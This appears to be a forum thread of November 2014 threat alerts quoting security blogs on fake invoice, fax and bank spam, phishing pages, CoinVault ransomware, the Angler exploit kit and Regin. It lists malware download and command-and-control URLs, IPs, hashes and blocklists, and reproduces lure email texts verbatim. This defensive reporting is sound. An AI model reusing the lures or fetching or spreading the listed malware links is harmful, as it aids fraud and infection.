Nov 11, 2014 - "ZeuS/ZBOT has been one of the most talked about malware families for several years, and with good reason... It is estimated that ZBOT has enabled cybercriminals to steal more than $100 million US dollars since its inception... the Commercial Crime Bureau of Hong Kong Police Force estimates this kind of fraud has netted attackers up to $75 million US dollars in the first half of this year, from Hong Kong alone... cybercriminals in a single city, within six-months, equaled all the losses from ZBOT up to the present. Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable... clever targeting, patience, cunning and simple keyloggers have netted these cybercriminals large sums of money. These highlight that cybercrime activities are dependent not only on the sophistication of the tools used, but on how well organized the entire scheme is... The following graphs show the distribution of the victims that we observed, both by country and by industry:
Predator Pain/Limitless Victims by Country:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Country-Distribution-01.jpg
Predator Pain/Limitless Victims by Industry:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Industry-Distribution-01.jpg

- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cybercrime-to-cyberspying-limitless-keylogger-and-predator-pain/
"... The cybercriminals instead went after SMBs (small and medium-sized businesses), which led us to realize how vulnerable they are to the threat..."

:mad: :fear:

FYI...

Fake 'Police' SPAM ...
- http://blog.dynamoo.com/2014/11/exchange-house-fraud-police-headquaters.html
12 Nov 2014 - "I got a lot of these yesterday..

From: omaniex@ investigtion .com
Subject: Exchange House Fraud (Police Headquaters)
please note that your attension is needed in our station, as we got information on this fraud information as transactions detailed in attachment. kindly acknowledge this letter and report to our office as all report and contact details are in attachment. failure to this you will be held responsible.
Note: come along with your report as it will be needed
regards,
Police headquarters.
Investigtion dept.

Attached is a file EXCH DETAILS PR 7777709.zip which contains two files:
7 TRANSACTION RPPP 00000123-PDF.jar
PR0JECT INVESTIGATI 011111-PDF.jar
... malicious application written in Java (top tip - if you have Java installed on your computer, remove it. You probably -don't- need it). It has a VirusTotal detection rate of 7/55*..."
* https://www.virustotal.com/en/file/bd15776998194aa3a1be49a9eeb982fcb69cf57c76cd7319e1553b929b4f6349/analysis/1415792881/
___

ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/102455898273/adp-past-due-invoice-spam
Nov 12, 2014 - "Subjects Seen:
ADP Past Due Invoice#54495150
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here.
Important: Please do not respond to this message. It comes from an unattended mailbox.

Malicious URLs:
kurdogluhotels .com/docfiles/invoice_1211.php
kevalee .ac.th/docfiles/invoice_1211.php
Malicious File Name and MD5:
invoice1211_pdf27.zip (05FC7646CF11B6E7FB124782DAF9FB53)
invoice1211_pdf.exe (78CF05FAA79B41B4BE4666E3496D1D54)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4eb2bf63ec6433cda6fde59dcbf32fc9/tumblr_inline_nexql2Bx451r6pupn.png

Tagged: ADP, Upatre

- http://blog.dynamoo.com/2014/11/adp-past-due-invoice39911564-spam.html
12 Nov 2014
... Recommended blocklist:
188.165.206.208
shahlart .com
mboaqpweuhs .com "

- http://www.threattracksecurity.com/it-blog/adp-past-due-invoice-spam/
Nov 13, 2014 - "... the Upatre Trojan, which in turn downloaded and decrypted the banking-credential-stealing Trojan Dyre..."
Screenshot: http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/11/ADP-Past-Due-Invoice.png

94.23.49.77: https://www.virustotal.com/en/ip-address/94.23.49.77/information/

:mad: :fear:

FYI...

Fake 'BankLine' SPAM - targets RBS customers
- http://blog.mxlab.eu/2014/11/13/fake-email-regarding-new-secure-message-from-bankline-that-targets-rbs-customers/
Nov 13, 2014 - "... intercepted -fake- emails regarding a new secure message from BankLine that targets RBS customers. The subject line is “You have received a new secure message from BankLine#24802254″ this email is sent from the spoofed address “Bankline <secure.message @ bankline .com>” and has the following body:
You have received a secure message.
Read your secure message by following the link bellow:
link-
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 1196.
First time users – will need to register after opening the attachment...

The embedded URL in our sample leads to hxxp ://vsrwhitefish .com/bankline/message.php. This will open up and HTML document with an integrated Javascript script that will make use of ActiveXObject or a regular HTTP request, opens up a download in order to open and/or save the malicious file as instructed."

216.251.43.98: https://www.virustotal.com/en/ip-address/216.251.43.98/information/
... 5/60 2014-11-13 13:23:41 http ://vsrwhitefish .com/bankline/message.php
___

Fake 'Voice mail' SPAM ...
- http://blog.mxlab.eu/2014/11/13/voice-message-emails-contains-security-threat/
Nov 13, 2014 - "... intercepted a large campaign by email with the subject “Voice Message #0768384921 (numbers may vary)” and is continuation of the previous campaign targeting RBS customers. This email is sent from the spoofed address “Message Admin <martin.smith@ essex .org.uk>” and has the following body:

Voice redirected message
hxxp ://crcmich .org/bankline/message.php
Sent: Thu, 13 Nov 2014 11:54:24 +0000

The embedded URL in our sample leads to hxxp ://crcmich .org/bankline/message.php. This will open up and HTML document with an integrated Javascript script that will make use of ActiveXObject or a regular HTTP request, opens up a download in order to open and/or save the malicious file as instructed."

69.160.53.51: https://www.virustotal.com/en/ip-address/69.160.53.51/information/
... 3/61 2014-11-13 15:04:47 http ://crcmich .org/bankline/message.php?
___

Alert (TA14-317A)
Apple iOS "Masque Attack" Technique
- https://www.us-cert.gov/ncas/alerts/TA14-317A
Nov 13, 2014
Systems Affected:
iOS devices running iOS 7.1.1, 7.1.2, 8.0, 8.1, and 8.1.1 beta.
Overview:
A technique labeled “Masque Attack” allows an attacker to substitute malware for a legitimate iOS app under a limited set of circumstances...
(More detail at the URL above.)

:mad: :fear:

FYI...

Fake 'Amazon frozen account' – Phish ...
- http://myonlinesecurity.co.uk/amazon-account-frozen-temporarily-phishing/
14 Nov 2014 - "'Your account has been frozen temporarily' pretending to come from Amazon <auto-confirm@ amazon .co.uk> is one of the latest -phish- attempts to steal your Amazon Account and your Bank, credit card and personal details. This one only wants your personal details, Amazon log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_phishing-email.png
If you open the -attached- html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_login.png
When you fill in your user name and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. After submitting the information you get -bounced- on to the genuine Amazon .co.uk website:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_account_verification.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___

CoinVault - new ransomware
- http://www.webroot.com/blog/2014/11/14/coinvault/
Nov 14, 2014 - "Today we encountered a new type of encrypting ransomware that looks to be of the cryptographic locker family. It employs the same method of encryption and has a very similar GUI (kills VSS, increases required payment every 24hr, uses bitcoin payment, etc.).
CoinVault GUI:
> https://i.imgur.com/ADEO21U.png
Here is the background* that it creates – also very similar.
* https://i.imgur.com/LAHkjT8.png
... this is the first Encrypting Ransomware that I’ve seen which actually gives you a free decrypt. It will let you pick any single file that you need after encryption and will decrypt it for you.
> http://i.imgur.com/F3enAqN.png
... it gives a good insight into what the actual decryption routine is like if you find yourself actually having to pay them. I suspect that this freebie will increase the number of people who will pay..."

- http://arstechnica.com/security/2014/11/new-cryptoware-title-borrows-page-from-drug-dealers/
Nov 14 2014
___

Flash Player updated ...
- https://blog.malwarebytes.org/online-security/2014/11/18-vulnerabilities-fixed-update-your-flash-player/
Nov 14, 2014 - "Adobe has fixed -18- vulnerabilities in their Flash Player, and you should update immediately, if you haven’t already done so. However, please ensure you’re installing / updating from the right place. For example:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd1.jpg
The above site claims:
It is recommended that you update Flash to the latest version to view this page. Please update to continue. Your Flash Plugin version is too low, causing the current sites and related softwares can not be opened properly, please update your Flash Plugin now!
The site -forwards- visitors to a sign-up page offering a “Mac cleaning” tool... confusing for anybody expecting Adobe Flash updates.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd2.jpg
The Adobe Flash Player website is the place to go for Flash installs*... Always cast a critical eye at the URL of any “Flash Player” site you happen to be on, and check the small print in case you end up with more than you bargained for. Fake Flash Player websites have been around for many years, and are often a prime source of unwanted PUP installs and the occasional slice of Malware..."
* http://get.adobe.com/flashplayer/ ... (Uncheck the 'McAfee' option if you choose not to use it...)

:fear::fear: :mad:

FYI...

Fake Fax SPAM - malicious .DOCM attachment
- http://blog.dynamoo.com/2014/11/interfax-failed-fax-transmission-spam.html
17 Nov 2014 - "This -fake- fax spam comes with a malicious attachment
From: Interfax [uk@ interfax .net]
Date: 13 November 2014 20:29
Subject: Failed Fax Transmission to 01616133969@fax.tc<00441616133969>
Transmission Results
Destination Fax: 00441616133969
Contact Name: 01616133969@ fax .tc
Start Time: 2014/11/13 20:05:27
End Time: 2014/11/13 20:29:00
Transmission Result: 3220 - Communication error
Pages sent: 0
Subject: 140186561.XLS
CSID:
Duration (In Seconds): 103
Message ID: 485646629
Thank you for using Interfax ...

Attached is a malicious Word macro file called 00000293.docm which is currently undetected at VirusTotal*... Inside this .DOCM file is a malicious macro... which attempts to download a malicious binary from http ://agro2000 .cba .pl/js/bin.exe . This file is downloaded to %TEMP%\MRSWZZFEYPX.exe and the binary also has zero detections at VirusTotal**, and the Malwr report shows that it tries to connect to the following URL: http ://84.40.9.34 /lneinn/mo%26af.lipgs%2Bfn%7El%3Fboel%3D%3F+%3Fa%20%3F~pigc_k/ci$slf%2B%20l%3D%7E . It then drops a malicious DLL onto the target system which has a rather better detection rate of 12/53***. If you are a corporate email admistrator they you might consider blocking .DOCM files at the perimeter as I can see no valid reason these to be sent by email. You should definitely block 84.40.9.34 (Hostway, Belgium) as this is a known bad server that has been used in several recent attacks."
* https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416221806/

** https://www.virustotal.com/en/file/8307c13583837bcfc30e8c267133f33e3fff4d86abd59adcb7f1fb7dd04a0d54/analysis/1416222127/

*** https://www.virustotal.com/en/file/1a774212d3f20523c4ddd63dd657954eeb7bf97c19ce9a9838b5297239c0119b/analysis/1416222797/

84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/

- http://myonlinesecurity.co.uk/failed-fax-transmission-01616133969fax-tc-word-doc-malware/
17 Nov 2014
> https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416212735/
___

Fake Investment SPAM ...
- http://myonlinesecurity.co.uk/investment-opportunities-ireland-malware/
17 Nov 2014 - "'Investment Opportunities in Ireland' pretending to come from IDA Ireland (Home of Foreign Businesses) <info@idaireland.com> with a link to a malicious zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Investment-Opportunities-in-Ireland.png

Todays Date: investmentareas.rar: Extracts to: investmentareas.scr
Current Virus total detections: 26/55* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b05b065ab2fbb6db6c29fd0a6ad856bca0fafe46322d91890dc1755788ea6e7b/analysis/1416215003/
___

Fake 'Payment Declined' Phish ...
- http://myonlinesecurity.co.uk/bt-account-payment-declined-phishing/
17 Nov 2014 - "Any phishing attempt wants to get as much personal and financial information from you as possible. This 'BT Account- Payment Declined' pretending to come from BT .com <noreplymail@ btc .com> phishing scam is one of them. The phishers try to use well known companies or Government departments like British Telecom, HMRC, Inland Revenue, Virgin Media, British Gas or any company that many people are likely to have an account with. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/BT-Account-Payment-Declined.png

The link in the email leads you to a webpage looking like:
Screenshot2: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-log-in.png

That leads on to a page to enter all your details, including bank account, credit card, mother’s maiden name and everything else necessary to steal your identity and clean out your bank and credit card accounts:
Screenshot3: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details.png

Then you get a success page, where they kindly inform you that “The Anti Fraud System has been succesfully added to your account” and then are bounced to the real BT site:
Screenshot4: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details-success-.png

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
___

Fake 'Test message' SPAM plague continues..
- http://blog.dynamoo.com/2014/11/test-message-spam-plague-continues.html
17 Nov 2014 - "This plague of spam "test messages" have been going on for two days now, probably sourced from "Botnet 125"* which sends most of the spam I get. These messages are annoying but no harmful in themselves, I suspect they are probing mail servers for responses. If you have a catch-all email address then you will probably see a lot of these. The targets are either completely random or have been harvested from one data breach or another as far as I can see.
From: Hollie <Laurie.17@ 123goa .com>
Date: 17 November 2014 19:04
Subject: Test 8657443T
test message.
Murphy became a free agent on October 15, after refusing a minor league assignment. Silva implies the last cycle has begun, believing herself to be the host.
Icelandic had been heard. American CIA contract air crews and pilots from the Alabama Air Guard... ..."
* http://www.proofpoint.com/threatinsight/posts/dueling-dridex-campaigns-target-banking-customers.php

:mad: :fear:

FYI...

Fake Invoice SPAM - Word doc malware attached
- http://myonlinesecurity.co.uk/email-contains-invoice-file-attachment-invoice-1633370-may-word-doc-malware/
18 May 2014 - "'Invoice #1633370 May' with a malicious word doc attachment saying 'This email contains an invoice file attachment' is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

This email contains an invoice file attachment

So far today, I have seen 3 different size files attached to this email, All file names are random:
18 November 2014 : invoice_796732903.doc (59kb) Current Virus total detections: 1/55*

18 November 2014 : invoice_1952581.doc (41kb) Current Virus total detections: 1/55**

18 November 2014 : invoice_80943810.doc (22kb) Current Virus total detections: 0/54***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0a78296121f16e13812c609c2d55245a492b6a992c99b403b2427e41acae9e72/analysis/1416303264/

** https://www.virustotal.com/en/file/70411393ea66130204abfb3653646dcb495538fbbc6a5a76bef1376625d2fcbf/analysis/1416304606/

*** https://www.virustotal.com/en/file/670011a08ddcde9d1892593a968f87e9e8800248f6bb9b8967b05ec4c34b64d0/analysis/1416304325/
___

Another Fake FAX SPAM run ...
- http://blog.dynamoo.com/2014/11/incoming-fax-report-spam-lets-party.html
18 Nov 2014 - "... 'need to load some more papyrus into the facsimile machine...:
From: Incoming Fax [no-reply@ efax .co.uk]
Date: 18 November 2014 13:16
Subject: INCOMING FAX REPORT : Remote ID: 766-868-5553
INCOMING FAX REPORT
Date/Time: Tue, 18 Nov 2014 14:16:58 +0100
Speed: 4222bps
Connection time: 01:09
Pages: 5
Resolution: Normal
Remote ID: 963-864-5728
Line number: 1
DTMF/DID:
Description: Internal report
We have uploaded fax report on dropbox, please use the following link to download your file...

This is (of course) utter bollocks, and the link in the email downloads a ZIP file document_8731_pdf.zip which in turn contains a malicious executable document_8731_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the Malwr report it makes these following HTTP requests:
http ://108.61.229.224:13861 /1811us1/HOME/0/51-SP3/0/
http ://108.61.229.224:13861 /1811us1/HOME/1/0/0/
http ://159593.webhosting58 .1blu. de/mandoc/narutus1.pmg
It also drops a file EXE1.EXE onto the target system which has a detection rate of 7/55**...
Recommended blocklist:
108.61.229.224
159593.webhosting58 .1blu .de "
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416318405/
... Behavioural information
TCP connections
108.61.229.224: https://www.virustotal.com/en/ip-address/108.61.229.224/information/
178.254.0.111: https://www.virustotal.com/en/ip-address/178.254.0.111/information/

** https://www.virustotal.com/en/file/5ec1e1850100849dd4750ef083824806304e82be5233e241b69b1960acc96324/analysis/1416318784/

- http://myonlinesecurity.co.uk/incoming-fax-report-remote-id-999-745-5477-fake-pdf-malware/
18 Nov 2014
- https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/
___

Fake Voice msg SPAM again - PDF malware
- http://myonlinesecurity.co.uk/voice-message-685-869-9737-mailbox-226-fake-pdf-malware/
18 Nov 2014 - "'voice message from 685-869-9737 for mailbox 226' pretending to come from 'Voice Mail <voicemail_sender@ voicemail .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
You have received a voice mail message from 685-869-9737
Message length is 00:00:30. Message size is 225 KB.
Download your voicemail message from dropbox service below (Google Disk Drive Inc.)...

18 November 2014: document_8731_pdf.zip (12 kb): Extracts to: document_8731_pdf.exe
Current Virus total detections: 4/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/

:fear: :mad:

FYI...

Fake Bank phish ...
- http://myonlinesecurity.co.uk/lloyds-bank-improving-current-account-phishing/
19 Nov 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like :
-We’re improving your current account
-There have been unauthorised or suspicious attempts to log in to your account, please verify
-Your account has exceeded its limit and needs to be verified
-Your account will be suspended !
-You have received a secure message from < your bank>
-New Secure Message
-We are unable to verify your account information
-Update Personal Information
-Urgent Account Review Notification
-We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
-Confirmation of Order

This one is Lloyds bank 'We’re improving your current account' pretending to come from Lloyds Banking Group Plc <info@ emails.very .co.uk> The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever fill in the html (webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine bank website. Lloyds actually -do- allow you to pay in and perform some transactions at a Post Office rather than going to your branch, so many users might get unwittingly caught out by this one and think they need to notify the bank.
Email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/lloyds-We-are-improving-your-current-account.png

This one wants your personal details and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. If it says .EXE then it is a problem and should -not- be run or opened."
___

Azure cloud outages - MSN web portal offline
- http://www.reuters.com/article/2014/11/19/us-microsoft-web-idUSKCN0J309E20141119
Nov 18, 2014 11:53pm EST - "Microsoft Corp's Azure cloud-computing service, which hosts websites and lets customers store and manage data remotely, suffered serious outages on Tuesday taking its popular MSN web portal offline. According to Microsoft's Azure status page*, the problems started around 5pm Pacific time and have still not been fully solved..."
* http://azure.microsoft.com/en-us/status/#history

>> http://azure.microsoft.com/blog/2014/11/19/update-on-azure-storage-service-interruption/
Nov 19, 2014

:fear::fear: :mad:

FYI...

Angler Exploit Kit adds New Flash Exploit...
- http://threatpost.com/angler-exploit-kit-adds-new-flash-exploit-for-cve-2014-8440/109498
Nov 20, 2014 - "... Angler is just one of the many such exploit kits available to attackers, but the creators of this one seem to be especially quick about adding exploits for new vulnerabilities to the kit. In October, a week after Adobe released its monthly patch update, researchers saw Angler exploiting an integer overflow in Flash that had just been patched. “This is really, really fast,” Kafeine, a French security researcher who identified the attack at the time, said. “The best I remember was maybe three weeks in February 2014.” Now, Kafeine said he already has seen Angler exploiting a Flash vulnerability that was patched Nov. 11 in Adobe’s November update release*. This vulnerability is CVE-2014-8440, a memory corruption flaw in Flash that can allow an attacker to take control of a target system. The bug exists in Flash on multiple platforms, including Windows, OS X and Linux, and Kafeine said it is getting its share of attention from attackers. “The vulnerability is being exploited in blind mass attack. No doubt about it: the team behind Angler is really good at what it does,” he said in a blog post*..."
* http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html

> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8440 - 10.0 (HIGH)
Last revised: 11/12/2014

Flash test site: https://www.adobe.com/software/flash/about/
___

Fake Donation Overpayment SCAM
- https://www.ic3.gov/media/2014/141120.aspx
Nov 20, 2014 - "... received numerous complaints from businesses, charitable organizations, schools, universities, health related organizations, and non-profit organizations, reporting an online donation scheme. The complaints reported subjects who had donated thousands of dollars, via stolen credit cards. Once donations were made, the subjects immediately requested the majority of the donation back, but credited to a different card. They claimed to have mistakenly donated too much by adding an extra digit to the dollar amount (i.e., $5000 was ‘accidently’ entered instead of $500). However, very few complainants actually returned the money to the second credit card. Many, through their own investigations, discovered the original card was -stolen- or the credit card company notified them of such. Also, some of the organizations’ policies did not allow funds to be returned to a different credit card."

:fear::fear: :mad:

:mad:FYI...

Something evil on 46.8.14.154
- http://blog.dynamoo.com/2014/11/something-evil-on-46814154.html
21 Nov 2014 - "46.8.14.154 (Netart Group S.r.o. / Movenix International Inc) forms part of an exploit chain that starts with compromised OpenX servers and appears to end up with an exploit kit of some sort... subdomains have been active on that server, they are ALL hijacked GoDaddy domains... (Long list @ the dynamoo URL above) ... The best thing to do is to -block- traffic to 46.8.14.154 because these domains seem to change every few minutes."
___

Fake 'Payment Received' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-from.html
21 Nov 2014 - "This -fake- financial spam has a malicious Word document attached.
From: Enid Tyson
Date: 21 November 2014 15:36
Subject: INV209473A Duplicate Payment Received
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £675.74 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Enid Tyson
Accounts Department

In this case the attachment is De_209473A.doc but it will probably vary with the subject name, the document itself has zero detections at VirusTotal (the Malwr report is inconclusive).This contains a malicious macro.. which connects to the following URL:
http ://79.137.227.123 :8080/get1/get1.php
...This has a VirusTotal detection rate of just 1/55*. The malware is hardened against analysis in a Sandbox so automated results are inconclusive...
UPDATE: A second version is going the rounds, with zero detections** and a download location of http :// 61.221.117.205 :8080/get1/get1.php ..."
* https://www.virustotal.com/en/file/7beee0920340d5a610f458ce1ebc0575e7854e88e2cbe1bebd8ec6014b778fe5/analysis/1416584784/

* https://www.virustotal.com/en/file/ea85382435cf26e8066780b7115e4beef78caa0e8766bff324ff19e216496e4b/analysis/1416584533/

:fear: :mad:

FYI...

Fake 'Herbal Root' email SCAM
- http://blog.dynamoo.com/2014/11/oplamo-herbal-root-scam.html
22 Nov 2014 - "... there is no such thing as "Oplamo Herbal Root". So, this spam is almost definitely a scam.
From: Mr. Tom Good Hope [mrtomgood@ gmail .com]
Reply-To: mrtomgoodhope@ gmail .com
Date: 22 November 2014 02:24
Subject: SUPPLY BUSINESS OF OPLAMO
My name is Tom Goodhope i based in Liverpool,UK working with a pharmaceutical company.
I have decided to contact you directly to discuss briefly via email about the ongoing supply that came up in our company. I think if you can understand English and India Language (Hindi,Tamil etc) you can take up this business proposal to buy out OPLAMO HERBAL ROOT from the local producer in India and make supply to our company as the direct producer to enable our company be buying direct from you on every subsequent order after this first purchase. OPLAMO ROOT its used for production of Anti-viral drugs & Animal Vaccines.Our company have been purchasing the materials from Pakistan but it is very scarce and expensive now in Pakistan. I've found out the truth that this Pakistan people purchases this product in India at the rate of $210 USD, while they supply to our company at the rate of $430 USD... Upon your reply i will clarify you more on how to start this business immediately, please drop your contact phone number for me to be able to contact you ASAP.
Thanks,
Mr Tom Goodhope
Company Secretary ...

... the originating IP address is actually 123.239.58.103 in Delhi, sent via 198.20.245.154 [eas.easylhost .com] in the US... give it a very wide berth.
___

Fake 'my new photo' SPAM - malware - Google’s webp images
- http://myonlinesecurity.co.uk/new-photo-malware-googles-webp-images/
22 Nov 2014 - "... a persistent attack by email for some time now. The subject is always “my new photo” or the equivalent in Spanish. Until 2 days ago the -zip- attached to the email just contained a single malware file which is generally identified as Androm or Gamarue or Wauchos depending on which antivirus you have installed. It obviously takes a few hours or even a day or more for the antivirus companies to catch up with new versions so some users get infected. Over the last few days there has been a change in delivery methods. Along with the “normal” executable file there is what appears to be a standard jpg that won’t display natively in window explorer or in the majority of imaging/photo editing/viewing programs. It will display in Chrome browser. Looking at the file headers, the image is a genuine image but is the “new” webp format from google https ://developers.google .com/speed/webp/ which needs a codec from google to display in windows explorer or a plug in to display or use in common image editing/viewing programs. We will almost certainly see requests or comments in various forums or facebook or other tech help sites. It is believed that if a user “accidentally” or otherwise runs the exe file then the image is displayed in the browser (if chrome is default) or the google plugin or codec has been installed and the user thinks that it was just an image and not a malware file. Of course the .exe file has the extension hidden by default and the icon suggests it is a jpg image file which makes the unwary more likely to click on it and consequently become infected. I have been charting the progress of this malware for some time now, since it first appeared at end of August... we do see quite a few posts saying that the user cannot see the jpg image in an email or on a webpage in IE, FF etc but it -does- in chrome OR why they cannot view or edit a downloaded jpg. The zip file contains 2 files - 1 is a standard .exe with an icon that looks like a jpg that if you don’t have show hidden extensions shown can confuse a user and lead to infection when clicked on... If you open the image files in a hex editor or analysis program you will see the file type headers information:
for jpg they are ……JFIF…..`.`……Exif..MM
for PNG they are .PNG……..IHDR……………g…..sRGB………gAMA……a…..pHYs……….
For Webp they are RIFFhs..WEBPVP8 "
(Comparison example images shown at the URL at the top.)

:fear: :spider: :mad:

FYI...

RFID Payment Cards Hack possible with Android App
- http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-rfid-payment-cards-made-possible-with-android-app/
Nov 24, 2014 - "... high-risk Android app detected as ANDROIDOS_STIP.A in Chile. This app, found distributed through forums and blogs, can be used to hack into the user’s RFID bus transit card to recharge the credits... Paying via RFID cards is becoming more popular nowadays as more mobile devices add NFC support. Banks, merchants or public services issue RFID cards to their customers with prepaid credits... Using widely available tools, the attacker cracked the card’s authentication key. With the cracked key and the native NFC support in Android and the device, cloning a card and adding credits can be easily implemented in a mobile app... These particular MIFARE models were discontinued years ago and supplemented with more secure models. However, it appears that card issuers have opted for cheaper solutions which put their customers at risk...
> http://blog.trendmicro.com/trendlabs-security-intelligence/good-nfc-habits/
We recommend customers take steps to protect RFID cards in their possession. They should also periodically check the balances of their accounts as well. In addition, if possible, they should check if any cards they are currently using are vulnerable and report these to their providers. RFID/NFC attacks are a well-known risk..."
> http://blog.trendmicro.com/trendlabs-security-intelligence/safe-nfc-for-businesses/
___

Fake MyFax SPAM - poorly-detected malware
- http://blog.dynamoo.com/2014/11/myfax-message-from-unknown-spam-leads.html
24 Nov 2014 - "Fax spam again... This spam appears to come from the person receiving it (which is an old trick).
From: victim@ victimdomain .com
Sent: 24 November 2014 15:31
To: norep.c@ mefax .com
Subject: MyFax message from "unknown" - 3 page(s)
Fax Message [Caller-ID: 1-407-067-7356]
http ://159593 .webhosting58 .1blu .de/messages/get_message.php
You have received a 3 page fax at Mon, 24 Nov 2014 15:31:23 +0000.
* The reference number for this fax is chd_did11-14186364797-10847113200-628.
View this fax using your PDF reader.
Thank you for using the MyFax service!

The link in the message downloads a file faxmessage_7241_pdf61.zip which in turn contains a malicious executable faxmessage_7241_pdf.exe which has a VirusTotal detection rate of 4/53*... connects to the following URLs:
http ://95.211.199.37 :16792/2411us3/HOME/0/51-SP3/0/
http ://95.211.199.37 :16792/2411us3/HOME/1/0/0/
http ://lasuruguayas .com/images/refus3.pnk
A file EXE1.EXE is also dropped, with a VirusTotal detection rate of just 1/54**..."
* https://www.virustotal.com/en/file/bb34a977009276411c1eafa8a60d553c8ea847d32cc6071710eff6b743269e91/analysis/1416846678/

** https://www.virustotal.com/en/file/78eeb34989ac134081e005e076a46675cd0d2b4da552b4e6fe7e388489cde550/analysis/1416846980/

95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/

199.26.87.212: https://www.virustotal.com/en/ip-address/199.26.87.212/information/
___

Regin: spy tool
- http://www.symantec.com/connect/blogs/regin-top-tier-espionage-tool-enables-stealthy-surveillance
Updated: 24 Nov 2014 - "... A back door-type Trojan, Regin is a complex piece of malware whose structure displays a degree of technical competence rarely seen. Customizable with an extensive range of capabilities depending on the target, it provides its controllers with a powerful framework for mass surveillance and has been used in spying operations against government organizations, infrastructure operators, businesses, researchers, and private individuals...
Regin’s five stages:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig1-architecture.png
... Almost half of all infections targeted private individuals and small businesses. Attacks on telecoms companies appear to be designed to gain access to calls being routed through their infrastructure.
Confirmed Regin infections by sector:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig2-sectors.png
